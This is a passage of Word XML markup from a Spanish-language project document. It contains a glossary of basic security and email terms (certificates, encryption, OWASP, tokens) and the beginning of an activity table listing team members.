    <w:p w:rsidR="004F7BF9" w:rsidRDefault="004F7BF9" w:rsidP="004F7BF9">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc514520863"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GLOSARIO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="004F7BF9" w:rsidRDefault="004F7BF9" w:rsidP="004F7BF9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D0A37" w:rsidRPr="000D0A37" w:rsidRDefault="000D0A37" w:rsidP="00A06438">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Los certificados de autenticidad:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> También llamados certificados digitales y credenciales electrónicas, son documentos digitales que </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>atestig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> la relación entre una clave pública y un individuo o entidad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D0A37" w:rsidRPr="000D0A37" w:rsidRDefault="000D0A37" w:rsidP="00A06438">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D0A37" w:rsidRPr="000D0A37" w:rsidRDefault="000D0A37" w:rsidP="00A06438">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>El cifrado</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">: Es el proceso de transformar los datos de manera que no los pueda leer nadie salvo la persona autorizada para recibirlos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D0A37" w:rsidRPr="000D0A37" w:rsidRDefault="000D0A37" w:rsidP="00A06438">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D0A37" w:rsidRPr="000D0A37" w:rsidRDefault="000D0A37" w:rsidP="00A06438">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Dominio de correo electrónico:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> El dominio es la parte después de la @ en la dirección de correo electrónico. Su empresa puede tener más de uno (p. ej. hsbc.com, hsbc.com.hk) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D0A37" w:rsidRPr="000D0A37" w:rsidRDefault="000D0A37" w:rsidP="00A06438">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D0A37" w:rsidRPr="000D0A37" w:rsidRDefault="000D0A37" w:rsidP="00A06438">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">: Un servidor es un sistema o dispositivo de cómputo que gestiona los recursos de red. Con frecuencia, los servidores actúan como dispositivos de almacenamiento para los archivos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D0A37" w:rsidRPr="000D0A37" w:rsidRDefault="000D0A37" w:rsidP="00A06438">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D0A37" w:rsidRPr="000D0A37" w:rsidRDefault="000D0A37" w:rsidP="00A06438">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Servidor de correo:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0A37">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un servidor de correo procesa los mensajes entrantes de alguna manera (p. ej. filtro de correo no deseado) antes de enviarlos a la bandeja de entrada de los destinatarios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D0A37" w:rsidRPr="000D0A37" w:rsidRDefault="000D0A37" w:rsidP="00A06438">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A06438" w:rsidRPr="00A06438" w:rsidRDefault="00A06438" w:rsidP="00A06438">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A06438">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP (The Open Web Application Security Project): </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06438">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Es un proyecto de código abierto dedicado a determinar y combatir las causas que hacen que el software sea inseguro.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06438" w:rsidRPr="00A06438" w:rsidRDefault="00A06438" w:rsidP="00A06438">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A06438" w:rsidRPr="00A06438" w:rsidRDefault="00A06438" w:rsidP="00A06438">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A06438">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Token:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A06438">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un token de acceso es una cadena opaca que identifica a un usuario, aplicación o página, y que la aplicación puede utilizar para realizar llamadas a la API Graph. Los tokens de acceso se obtienen con distintos métodos, los cuales describiremos más adelante en este documento. El token incluye información acerca de su caducidad y de la aplicación que lo generó.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A5030D" w:rsidRPr="00A06438" w:rsidRDefault="00A5030D" w:rsidP="00A06438">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00A5030D" w:rsidRPr="00A06438">
          <w:headerReference w:type="default" r:id="rId112"/>
          <w:footerReference w:type="default" r:id="rId113"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A13A3" w:rsidRDefault="005A13A3" w:rsidP="005A13A3">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc514520864"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DIAGRAMA DE ACTIVIDADES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14"/>
    <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00977D14">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Líder de Proyecto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Andrés Moreno García</w:t>
      </w:r>
      <w:r w:rsidRPr="00977D14">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula5oscura-nfasis6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>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firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4414"/>
        <w:gridCol w:w="4414"/>
      </w:tblGrid>
      <w:tr w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidTr="002557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14" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00977D14">
              <w:t>MRG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00977D14">
              <w:t>Mayrani Reyes Galán</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidTr="002557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14" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>JAAB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>José Alfredo Armenta Blanco</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidTr="0025575A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4414" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>EAMM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Erick Antonio Mejía Meza</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidTr="002557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14" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>AMG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Andrés Moreno García</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidTr="0025575A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4414" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00977D14">
              <w:t>Todos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00977D14">
              <w:t>Todos los miembros del Equipo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis6"/>
        <w:tblW w:w="13440"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4A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="562"/>
        <w:gridCol w:w="2475"/>
        <w:gridCol w:w="1260"/>
        <w:gridCol w:w="1489"/>
        <w:gridCol w:w="1418"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="3118"/>
      </w:tblGrid>
      <w:tr w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidTr="003A7A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Merge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Actividad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Responsable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6025" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Fechas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Áreas de Mejora y tentativas de solución</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidTr="003A7A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Merge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="DejaVu Sans"/>
                <w:color w:val="00000A"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="DejaVu Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00000A"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
